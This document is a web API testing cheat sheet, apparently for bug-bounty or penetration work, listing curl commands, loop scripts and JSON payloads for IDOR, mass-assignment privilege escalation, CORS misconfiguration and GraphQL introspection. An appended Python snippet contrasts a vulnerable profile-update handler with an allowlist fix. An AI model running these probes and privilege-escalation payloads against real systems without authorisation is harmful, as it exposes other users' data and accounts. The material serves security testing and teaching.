api::testing

web REST · GraphQL authz bypass
01 Triage
Initial recon
curl -i https://target/api/
curl -i -X OPTIONS https://target/api/users
curl -s https://target/openapi.json
curl -s https://target/swagger.json
curl -s https://target/api/docs

Check:
- auth placement
- content-type
- method support
- CORS
- versioning
- errors / stack traces
Common endpoints
/api  /api/v1  /v1  /graphql
/openapi.json  /swagger  /swagger-ui
/docs  /redoc  /health  /metrics
Body templates
curl -i https://target/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"a","password":"b"}'

curl -i https://target/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'username=a&password=b'
02 REST
Method confusion
Test GET / POST / PUT / PATCH / DELETE / OPTIONS

Example
curl -i -X PATCH https://target/api/user/1 \
  -H "Content-Type: application/json" \
  -d '{"role":"admin"}'
IDOR
Swap:
- numeric IDs
- UUIDs
- org / tenant IDs
- order / invoice IDs

Watch:
- 403 vs 404 (reveals whether the object exists)
- same schema for other users
- list endpoints returning extra data
Mass assignment
Try adding:
{"isAdmin":true}
{"role":"admin"}
{"verified":true}
{"ownerId":"2"}

Great targets:
- signup
- profile update
- team membership
- order creation
03 Auth & CORS
Auth placement
Check:
- Cookie only
- Bearer only
- both accepted
- x-api-key
- token in query
- trust in x-user-id / x-role headers
CORS
curl -i https://target/api/me \
  -H "Origin: https://evil.example"

Look for:
Access-Control-Allow-Origin
Access-Control-Allow-Credentials
Access-Control-Allow-Headers

Bad signs:
- reflected Origin
- wildcard + sensitive data
04 GraphQL
Discovery
/graphql  /api/graphql  /query

curl -s https://target/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"query{__typename}"}'
Introspection
curl -s https://target/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name fields{name}}}}"}' | jq

If blocked:
- inspect JS bundle
- use GraphQL error messages
- fuzz common names: me, user, admin
GraphQL bug classes
- IDOR by resolver
- hidden fields via fragments
- batching / alias abuse
- expensive query DoS
- authZ mismatch between resolvers
- schema leakage through errors
05 Bug Classes
IDOR
user/1 → user/2
invoice/100 → 101
Mass assignment
isAdmin
role
verified
ownerId
AuthZ drift
UI blocked
API still works
CORS
reflected Origin
wildcard + creds
Version drift
/v1 fixed
/v2 still broken
Debug leftovers
/openapi.json
/metrics
stack traces
06 Decision Tree
What to test next?
Have endpoint but no docs?
  → OPTIONS, docs paths, JS bundle grep

Have token but little access?
  → IDOR, org / team / owner fields

JSON update endpoint?
  → mass assignment

GraphQL found?
  → __typename, introspection, schema hunting

Cross-origin behavior suspicious?
  → Origin + creds + preflight
07 Automation
Docs probe
for p in /openapi.json /swagger.json /swagger /api/docs /redoc; do
  curl -skI https://target$p | head -n 1
done
JSON field fuzzing
jq '. + {"isAdmin":true,"role":"admin"}' body.json | curl -s https://target/api/profile \
  -H "Content-Type: application/json" \
  -d @-
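As an added example (not part of this cheat sheet), the mass-assignment bug that the 02 REST probes and the JSON field fuzzing above look for, shown as a vulnerable profile-update handler beside its hardened allowlist form; the stored record, the writable-field policy and the request body are constructed for illustration.

```python
"""Mass assignment: merge-everything handler vs. allowlist handler.

The probe fields from the cheat sheet (isAdmin, role, verified, ownerId)
only take effect when the server copies arbitrary request keys into the
stored record. The fix is to copy an explicit allowlist and log the rest.
"""
import copy

# Constructed sample: the record a PATCH /api/profile would modify.
STORED_USER = {
    "id": 1, "username": "alice", "email": "alice@example.test",
    "role": "user", "isAdmin": False, "verified": False, "ownerId": "1",
}

# Assumed policy: the only fields a user may change about their own profile.
WRITABLE_FIELDS = frozenset({"username", "email"})


def update_profile_vulnerable(user: dict, body: dict) -> dict:
    """Merges every submitted key, so {"role":"admin"} escalates the account."""
    updated = copy.deepcopy(user)
    updated.update(body)
    return updated


def update_profile_hardened(user: dict, body: dict) -> tuple[dict, list[str]]:
    """Copies only allowlisted keys; returns the rejected keys (sorted) so the
    caller can log them as a mass-assignment probe rather than silently drop them."""
    updated = copy.deepcopy(user)
    rejected = []
    for key, value in body.items():
        if key in WRITABLE_FIELDS:
            updated[key] = value
        else:
            rejected.append(key)
    return updated, sorted(rejected)


if __name__ == "__main__":
    # Constructed request body: one legitimate change plus the four probe fields.
    body = {"email": "new@example.test", "isAdmin": True, "role": "admin",
            "verified": True, "ownerId": "2"}
    print("vulnerable:", update_profile_vulnerable(STORED_USER, body))
    print("hardened:  ", update_profile_hardened(STORED_USER, body))
```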
GraphQL loop
for q in \
  'query{__typename}' \
  '{__schema{types{name}}}' \
  'query{me{id email}}'
do
  curl -s https://target/graphql \
    -H "Content-Type: application/json" \
    -d "{\"query\":\"$q\"}" | jq
done